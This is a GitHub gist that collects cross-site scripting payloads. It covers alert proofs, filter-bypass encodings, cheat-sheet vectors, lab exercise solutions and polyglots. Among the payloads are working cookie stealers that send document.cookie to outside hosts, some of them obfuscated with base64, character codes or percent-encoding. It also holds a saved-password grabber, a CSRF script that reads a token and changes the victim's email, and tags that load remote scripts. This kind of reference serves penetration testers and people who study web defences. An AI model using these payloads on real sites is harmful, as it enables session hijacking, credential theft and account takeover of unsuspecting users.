Skip to content

Instantly share code, notes, and snippets.

@ptrk01

ptrk01/alert.js

Forked from MBA87/alert.js
Created September 27, 2025 15:04
Show Gist options
  • Save ptrk01/346570e936dad3cb0e453d0755a34919 to your computer and use it in GitHub Desktop.
Save ptrk01/346570e936dad3cb0e453d0755a34919 to your computer and use it in GitHub Desktop.
Download ZIP
Ways to alert(document.domain)
Raw
alert.js
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
al+ert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
top['alert'](document.domain);
top[8680439..toString(30)](document.domain);
top[/alert/.source](document.domain);
alert(this['document']['domain']);
alert(document['cookies'])
//Breaking Javascript
'-alert(document.domain)-'
';alert(document.domain)//
\';alert(document.domain)//
'-alert(document.domain)-'
</script><script>alert(1)</script>
//INside handlers
" autofocus onfocus=alert(document.domain) x="
//Inside href
<a href="javascript:alert(document.domain)">
//Using jQuery or template
${alert(document.domain)}
//AngularJS (if inside ng-app)
{{$on.constructor('alert(1)')()}}
// Indirect Invocation
alert.call(null, document.domain);
alert.apply(null, [document.domain]);
alert.bind()(document.domain);
Reflect.apply(alert, null, [document.domain]);
alert.valueOf()(document.domain);
with(document) alert(domain);
Promise.all([document.domain]).then(alert);
document.domain.replace(/.*/, alert);
// Array methods
[document.domain].find(alert);
[document.domain].findIndex(alert);
[document.domain].filter(alert);
[document.domain].every(alert);
[document.domain].forEach(alert);
// Alternate array syntax (all array methods apply)
Array(document.domain).find(alert);
Array.of(document.domain).find(alert);
(new Array(document.domain)).find(alert);
// Other Datastructure Methods
(new Map()).set(1, document.domain).forEach(alert);
(new Set([document.domain])).forEach(alert);
// Evaluated
eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs='));
eval(atob(/YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs=/.source));
eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59));
setTimeout`alert\u0028document.domain\u0029`;
Set.constructor`alert\x28document.domain\x29```;
(new Function('alert(document.domain)'))();
(new (Object.getPrototypeOf(async function(){}).constructor)('alert(document.domain)'))();
Function('x','alert(x)')(document.domain);
// Template Literal Expression
`${alert(document.domain)}`;
// onerror assignment
onerror=alert;throw document.domain;
onerror=eval;throw'=alert\x28document.domain\x29';
// With location.hash = #alert(document.domain)
eval(location.hash.substr(1))
//ANgular
{{$on.constructor('alert(1)')()}}
===Filters Bypasses:===
//null byte
<[%00]img onerror=alert(1) src=x>
<img o[%00]nerror=alert(1) src=x>
<img onerror=a[%00]lert(1) src=x>
//random tag name
<x onclick=alert(1) src=a>click</x>
//Space following tag name:
<img[%09]onerror=alert(1) src=x>
<img[%0d]onerror=alert(1) src=x>
<img[%0a]onerror=alert(1) src=x>
<img/"onerror=alert(1) src=x>
<img/'onerror=alert(1) src=x>
<img/anyjunk/onerror=alert(1) src=x>
<img/onerror="alert(1)"src=x>
//HTML encoding
<img onerror=a&#x6c;ert(1) src=x>
<img onerror=a&#108;ert(1) src=x>
//unicode encoding
%u00AB <<
%u00BB >>
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
//javascript escaping
\u006c <=> l
//weird syntax
<script<{alert(1)}/></script>
//UTF7
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
//2 inputs placeholder (multi bytes char)
input1: [%f0]
input2: "onload=alert(1);
//COOKIE STEALER
<script>new Image().src="http://192.168.1.110:1234/a.php?cookie="+encodeURI(document.cookie);</script>
<script>
fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
//exploit the autosave password
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
//XSS for CSRF
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email', true);
changeReq.send('csrf='+token+'&[email protected]')
};
</script>
================================================================================================
XSS Elearn exercises:
Solutions
XSS 1
<script>alert('l33t')</script>
XSS 2
<script <script>>alert('l33t')</script>
XSS 3
<svg/onload=alert('l33t')>
XSS 4
<svg><script>alert('l33t')
XSS 5
<svg><script>alert&lpar;'l33t'&rpar;
XSS 6
<script>\u0061lert('l33t')</script>
XSS 7
<script>eval('\x61lert(\'l33t\')')</script>
XSS 8
[NL]eval('\x61lert(\'l33t\')'
XSS 9
[\u2028]eval('\x61lert(\'l33t\')'
XSS 10
<script>eval(8680439..toString(30))(983801..toString(36))</script>
XSS 11
http://11.xss.labs%[email protected]/x.js
=========FILTER BYPASS===================
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<button onmouseover=a=String.fromCharCode(97,108,101,114,116,40,49,41),a.replace(/.+/,eval) onclick="myFunction()">Try it</button>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
alert;pg("XSS")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
===========================================EXTRA XSS PAYLOADS=====================================
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
REGULAR
***Weird imput***
<>?:@~!£$%^&*|\`'"{}[]()
\0 \b \t \n \v \f \r \e
<"" '><script>\x3C\u003c\u003e\u003C%3C&lt&lt;&LT&LT;&#60;alert(1);<script>prompt.call`${1}`</script>U+0022 &#34;
%c0%bcscript%c0%bd => UTF-7
&lgt;%00script>
<scrscriptipt>
&#34; => double quote encoded
U+0022 => double quote encoded
MISC double quotes
U+201D, U+201C, U+201E, U+201F, U+2E42, U+301D, U+301E, U+2033, U+301F, U+FF02
&#8220; and &#8221;
==Common==
alert(/xss/.source) # without quotes
window[/alert/.source](8) # without quotes
<input type="button" onmouseup="alert('XSS')"/>
<input type="button" oncliconcliconcliconcliconclickkkkk="alert('XSS')"/>
<body onload=alert(1)>
<img src=1 onerror=alert(1)>
<img/src="1>" onerror="alert(1)">
<svg onload=alert(1)>
<x onmouseover=alert(1)>
<iframe src=javascript:alert(1)>
<object data=javascript:alert(1)>
<script>eval.call`${'prompt\x281)'}`</script> =>no equal sign or double quote
<script>prompt.call`${1}`</script> => no () or =
>'>"><img src=x onerror=alert(0)>
javascript:alert(0)
data:text/html,<script>alert(0)</script>
"-alert(0)-"
";alert(0);//
'-alert(0)-'
"+alert(0)+"
");alert(0);//
<input onfocus=alert(0) autofocus>
"onmouseenter=confirm(1)>
<base href=//1dn.eu/a.js>
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
<a onmouseover="alert(1)" href="#">read this!</a>
<p <script>alert(1)</script>hello
</td <script>alert(1)</script>hello
<a%20href="data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg==">click%20me</a>
abc\'%window["alert"](9)//
abc\'window[String.fromCharCode(0x61,0x6c,0x65,0x72,0x74)](9)//
[(1,alert)(1)]
CSS based
<p style="font-family:'foo\27\3bxss:(alert(1))/*'">
<p style="filter: 'expression(alert(1))'">
<~/XSS STYLE=xss:expression(alert('XSS'))>
"><XSS STYLE="xss:expression(alert('XSS'))
</a style="xss:express/**/ion(alert('XSS'))">
JSFUCK => alert(1)
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
polyglot desesperate man
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
JSON
"}} )%3balert(1)%3b//
trying to play with URI structure
http://www.example.com/index.php/" onmouseover="JavaScript:alert(document.location)" name="?m=login .
http://testsite.test/<script>alert("TEST");</script>
JavaScript:alert(document.cookies);
Vbscript:MsgBox()
<INPUT type= "text" style= "font-family:e/**/xpression(alert('Hello'))">
"onclick=javascript:alert() x="
<script src=http://1dn.eu/a.js></script>
<A HREF="http://1dn.eu/a.js"> XSS</A>
AUTOFOCUS onfocus=alert(1)>
<input type="text" AUTOFOCUS onfocus=alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<script src=http://1dn.eu/a.js></script>
<SCRIPT a=">" SRC="http://1dn.eu/a.js"></SCRIPT>
<SCRIPT ="blah" SRC="http://1dn.eu/a.js"></SCRIPT>
<SCRIPT a="blah" '' SRC="http://1dn.eu/a.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://1dn.eu/a.js"></SCRIPT>
<SCRIPT a='>' SRC="http://1dn.eu/a.js"></SCRIPT>
"><XSS STYLE="xss:expression(alert('XSS'))
</a style="xss:express/**/ion(alert('XSS'))">
eval(alert(1));
<%00SCRIPT>alert('Vulnerable')</SCRIPT>
<%0dSCRIPT>alert('Vulnerable')</SCRIPT>
<~/XSS STYLE=xss:expression(alert('XSS'))>
{}*{xss:expression(open(alert(1)))} => CSS selector to be used for RPO relative style sheet that breaks when adding trailing /
javascript://google.com/?x=%0Aalert`Hello!`
#overlong UTF-8
<\x08script>alert(1)</script>
<\xFC\x80\x80\x80\x81\xA9\xFC\x80\x80\x80\x81\xAD\xFC\x80\x80\x80\x81\xA7 src='' onerror=alert(2) />
<\xFC\x80\x80\x80\x81\xA9mg src='' onerror=alert(2) />
"\xC1\xA9mg src='' onerror=alert(3) />
"\xF8\x80\x80\x81\xA9mg src='' onerror=alert(3) />
#hex HTML entities
<* BODY ONLOAD=&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;&#x3B;>
<* input type="image" src="http://aaaa/" onerror="x="'aler';x+="'t(\'Arian_i5_0wN3d!!1\')';eval(x);">
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://1dn.eu/a.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://1dn.eu/a.js"></SCRIPT>
</script><svg '//" onload=alert(1)//
</script><svg onload='-/"/-alert(1)//'
</script><+svg/o+nload=al+ert(1)>
<svg+o<scriptnload=alert(1)
<x/x=&{eval(name)};
<svg/onload=eval(name)
"><svg/onload=prompt(1)>
javascript://google.com/?x=%0Aalert`Hello!`
JQUERY
'>").on("error",function(){alert(9)});
$(":first img").each(function(k,o){o.src="x";o.onerror=alert(9)})
$(window).unload(function(){alert(9)})
$("body").html()[1] => grab '<'
$.get("http://evil.site/attack.js")
/</.source + "img" + />/.source
ANGULAR
x{{1==1}}x
Object["constructor"]("alert(1)")()
CSS injection
%0A{}*{color:red;}
%0A{}*{color:red;}/
%0A{}*{color:red;}//
%0A{}*{color:red;}///
in the URL and see if the code is red.To load an external stylesheet of arbitrary length, just replace the *{color: red;} payload with @import url(//evil.com).
OS INJECTION
<!--#exec cmd="ls .."-->
COOKIE CATCHER
=> changer l'adresse de reception
<iframe srcdoc="%26lt%3Bimg%20src%26equals%3Bx%3Ax%20onerror%26equals%3Beval%26lpar%3Batob%26lpar%3B%27ZG9jdW1lbnQubG9jYXRpb249Imh0dHBzOi8vd3d3LnBvdGF0b3BsYS5uZXQveHNzP2Nvb2tpZT0iK2VuY29kZVVSSShkb2N1bWVudC5jb29raWUpOw%3D%3D%27%26rpar%3B%26rpar%3B%26gt%3B
eval(unescape(String(/%2a%2a%2f%69%6d%67%3d%6e%65%77%20%49%6d%61%67%65%28%29%3b%20%69%6d%67%2e%73%72%63%3d%27%68%74%74%70%73%3a%2f%2f%72%65%71%75%65%73%74%62%2e%69%6e%2f%31%34%74%79%66%39%35%31%3f%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%2f%2a%2a/)));
<script
>
eval(String.fromCharCode(105, 109, 103, 61, 110, 101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 59, 32, 105, 109, 103, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 115, 58, 47, 47, 114, 101, 113, 117, 101, 115, 116, 98, 46, 105, 110, 47, 49, 52, 116, 121, 102, 57, 53, 49, 63, 39, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59));
<,/script
>
EVADE FILTERS
<img/src="mars.png"alt="mars">
<object><param name="src" value="javascript:alert(0)"></param></object>
<object data="javascript:alert(0)">
<isindex type=image src=1 onerror=alert(1)>
<isindex action=javascript:alert(1) type=image>
<img src=x:alert(alt) onerror=eval(src) alt=0>
XHTML
<x:script xmlns:x="http://www.w3.org/1999/
xhtml">alert('xss');</x:script>
MISC
location='javascript:alert(0)';
Object["constructor"]("alert(1)")()
name=window.name
location=name
In FireFox, you can incorporate the hash symbol
as a sharp variable, #0={}
http://victim.com/?param=";location=location.hash)//#0={};alert(0)
To PASS the Document.cookie
alert(document['cookie'])
with(document)alert(cookie)
REFERER CONTROLLED
eval(document.referrer.slice(10));
Use a ternary operator along with fake GET
paramaters, e.g.
0?fake1=1/*&id=42&name=";eval(1+location.string);"&lang=EN&fake2=*/:alert(0)
x setter=eval,x=1 => need to understand how does it works
http://site.com/?p=";eval(unescape(location))//#
%0Aalert(0)
""+{toString:alert}
""+{valueOf:alert}
OBFUSCATOR
-obfuscator
-encoder
-jjencode
-aaencode
-jsfuck.com
http://www.slideshare.net/hasegawayosuke
CREATE a FORM FROM XSS
https://secure.pay.com/#/login?message=<script%09>alert("XSS");var f = document.createElement("form");f.setAttribute('method',"post");f.setAttribute('action',"submit.php");var i = document.createElement("input");i.setAttribute('type',"text");i.setAttribute('name',"username");var s = document.createElement("input");s.setAttribute('type',"submit");s.setAttribute('value',"Submit");f.appendChild(i);f.appendChild(s);document.getElementsByTagName('body')[0].appendChild(f);
EXTRACT <> if encoded with JQUERY
https://secure.pay.com/#/login?message=<script>alert($("body").html()[0])
REF for more complicated stuffs
http://www.slideshare.net/BruteLogic/building-advanced-xss-vectors
http://www.securitysift.com/quotes-and-xss-planning-your-escape/
http://www.slideshare.net/hasegawayosuke
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20BlackHat%20US%202009%20favorite%20XSS%20Filters-IDS%20and%20how%20to%20attack%20them.pdf
http://polyglot.innerht.ml/
https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml#level-1
http://blog.portswigger.net/2017/09/abusing-javascript-frameworks-to-bypass.html
===========================================MISC=====================================
XSS
stealing the session cookie;
inducing user actions;
injecting Trojan functionality;
stealing cached autocomplete data; and
loglogging keystrokes.
deface it,
steal user's form values
redirect to form a phishing attack
look at cookies
try to send malware through a drive-by download attack
%c0%af => unicode percentage
https://www.branah.com/unicode-converter
=== Encoding Bypass ===
Ways to represent the “less than” char <
•0x3C
•0xC0 0xBC
•0xE0 0x80 0xBC
•0xF0 0x80 0x80 0xBC
\x3c\x3C\u003c\u003C<z1%3Cz2%253Cz3%uff1cz4\x3cz5\u003cz6%u00ABz7+ADw-z8<<z9«z10%u003cz11%3C&lt&lt;&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060
<
%3C
&lt
&lt;
&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060
\x3c
\x3C
\u003c
\u003C
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C
%uff1C
%uff1E
U+000A LINE FEED (LF) and U+000C FORM FEED (FF) => for multi lines input
https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml#level-5
=== Bad Characters ===
<>?:@~!£$%^&*()|\'
=== try it if u r deseperate
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3eCANARY
=== classic payload ===
<svg/onload=alert(1)>
'"</Script><Html Onmouseover=(alert)(1) //
<script>alert(1)</script>
<sCrIpt>alert(1)</ScRipt>
<<script>alert(0)</script>
<script src=http://1dn.eu/a.js></script>
<img/src="1>" onerror="alert(1)">
<img src="1" onerror="alert(1)">
<img src='1' onerror/=alert(0) />
<img/src='1'/onerror=alert(0)>
<img src='1'onerror=alert(0)>
<img src='1' onerror='alert(0)' <
<a onmouseover="alert(document.cookie)">link</a>
<body onload=alert('test1')>
<body onload=prompt(1) />
<body onload=confirm(1) />
(window[(![]+[])[1] + (![]+[])[2] + (![]+[])[4] +
(!![]+[])[1] + (!![]+[])[0]])(9)
<b onmouseover=alert('Wufff!')>click me!</b>
" onerror="alert(1)
javascript:alert(1)
j\avas\cript\:a\lert(2)
Prefix URI schemes.
Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)
<iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->
(payload without parenthesis or equal sign)
<script>prompt.call`${1}`</script>
(payload when parenthesis are encoded)
<svg><script>prompt&#40;1)<b>
https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
</xss:xss><svg/onload=alert(1)>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
=== Template injection ===
{7+7}
{var}
${var}
{{var}}
<%var%>
[% var %]
</XSS/*-*/STYLE=xss:e/**/xpression(alert(document.cookie))>
</z/*-*/style=z:e/**/xpression(document.write('z'))>
</z/*-*/style=z:e/**/xpression(alert(1))>
</a style="background:expression(alert(1))">
=== BRUTE LOGIC PAYLOADS ===
Technique Vector/Payload *
